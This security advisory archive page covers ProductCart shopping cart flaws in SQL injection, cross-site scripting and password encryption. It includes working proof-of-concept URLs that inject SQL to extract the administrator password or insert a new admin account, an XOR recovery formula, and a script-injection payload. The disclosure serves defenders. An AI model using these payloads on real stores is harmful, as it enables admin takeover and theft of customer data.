SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   ProductCart Vendors:   Early Impact
ProductCart 'advSearch_h.asp' Input Validation Flaw Lets Remote Users Inject SQL to Execute Arbitrary Commands on the System
SecurityTracker Alert ID:  1009085
SecurityTracker URL:  http://securitytracker.com/id/1009085
CVE Reference:   CVE-2004-2172, CVE-2004-2173, CVE-2004-2174   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Feb 17 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  

Description:   Several vulnerabilities were reported in ProductCart. A remote user can inject SQL commands and conduct cross-site scripting attacks.

S-Quadra reported that the 'advSearch_h.asp' script does not properly validate user-supplied input. A remote user can supply a specially crafted URL to cause SQL commands to be executed on the underlying database. A remote user can exploit this to gain administrative access to the application and view arbitrary data in the store database, the report said. In addition, a remote user can reportedly invoke xp_cmdshell to execute arbitrary operating system commands on the target system.

It is also reported that 'custva.asp' does not properly validate user-supplied input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ProductCart software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

http://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"

It is also reported that the software uses a stream encryption algorithm to encrypt passwords in the database using a single key. A local user (or a remote user with access to the system) can reportedly perform a choosen plaintext attack to obtain first 100 bytes of keystream (the maximum length of a customer password) and decrypt passwords stored in the database.

The vendor was reportedly notified on January 29, 2004.

Impact:   A remote user can execute SQL commands on the target system, including operating system commands via the xp_cmdshell function.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ProductCart software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A local user (or a remote user with access to the system) can conduct known plaintext attacks to decrypt passwords stored in the database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.earlyimpact.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] EarlyImpact ProductCart shopping cart software multiple security


      S-Quadra Advisory #2004-02-16

Topic: EarlyImpact ProductCart shopping cart software multiple security 
vulnerabilities
Severity: High
Vendor URL: http://www.earlyimpact.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040216.txt
Release date: 16 Feb 2004

1. DESCRIPTION

  ProductCart is a shopping cart application for e-commerce enabled 
sites. Its written on ASP, works on most Windows platforms and uses MS 
Access or MS SQL Server as a backend. Please visit 
http://www.earlyimpact.com for information about ProductCart shopping cart.

2. DETAILS

-- Vulnerability 1: Incorrect use of cryptography

  ProductCart software uses stream cipher algorithm (possibly RC4) to 
encrypt various passwords before storing them in a database. A stream
cipher generates a keystream (a sequence of bits used as a key). 
Encryption is accomplished by combining the keystream with the plaintext
with the bitwise XOR operation. The generation of the keystream is
independent of the plaintext and ciphertext. In ProductCart the single
cryptographic key used to encrypt all customers and store administrator
passwords so it's possible for an attacker to perform a choosen
plaintext attack and obtain first 100 bytes of keystream (maximum length
of customer password). Using this bytes an attacker can decrypt any
encrypted information from the database including store administrator
password.

-- Vulnerability 2: SQL Injection vulnerability

  An SQL Injection vulnerability has been found in the 'advSearch_h.asp'
script.

  Inproper use of user supplied input filters allows an attacker to
modify SQL query and perform some kinds of SQL injection attacks.

  Successfull exploitation of this vulnerability could allow an attacker
to gain administrative access to ProductCart store and read any
information from store database (i.e. customers private data). Also an
attacker could execute arbitrary commands using xp_cmdshell function.

-- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'

  By injecting specially crafted javascript code in url and tricking a
user to visit it a remote attacker can steal user session id and gain
access to user's personal data.

-- PoC code

--Vulnerability 1 and 2:

Platform: MS SQL Server as a backend
  ProductCart software incorrect uses cryptographic algorithms to protect
store administrator password. Combination of this error and SQL 
injection vulnerability allow an attacker to gain administrative access
to store.

  Performing following scenarion an attaker can find the store
administrator username and password.

Scenario:

1. An attacker register new customer in store. Let the value of field
'Postal Code' in the registration form will be equal to '987654' and an
attacker must select long password (it should be longer then the store
administrator password).

2. An attacker performs the following request

http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins
),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&
 


3. An attacker goes to http://www.shop.com/productcart/pc/Custmoda.asp
and reads his personal information. The value of the "FirstName" field
in this form will be store administrator login name. Store administrator
password is easy to find by this formula:

  adminpass = (Last Name) xor (Phone) xor (customer login password from
scenario step 1)

In the following scenario an attacker can add a new administrator to store

Scenario:

1. An attacker register new customer in store. Let the value of 'First
Name' field in registration form will be equal to
'1*2*3*4*5*6*7*8*9*10*', the value of 'Last Name ' field will be equal
to '34567', the value of 'Password' field will be equal to '111' and the
value of 'Postal Code' field will be equal to '987654'.

2. An attacker performs the following request:

http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20z
ip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&
 


3. An attacker logs into the store admin interface with username
'34567' and password '111'.

-- Vulnerability 3:

http://www.shop.com/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><" 


3. FIX INFORMATION

  S-Quadra alerted EarlyImpact development team to this issue on 29th
January 2004.

4. CREDITS

  Nick Gudov <cipher@s-quadra.com> is responsible for discovering this 
issue.

5. ABOUT

  S-Quadra offers services in computer security, penetration testing and
network assesment, web application security, source code review and
third party product vulnerability assesment, forensic support and
reverse engineering.

         S-Quadra Advisory #2004-02-16

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC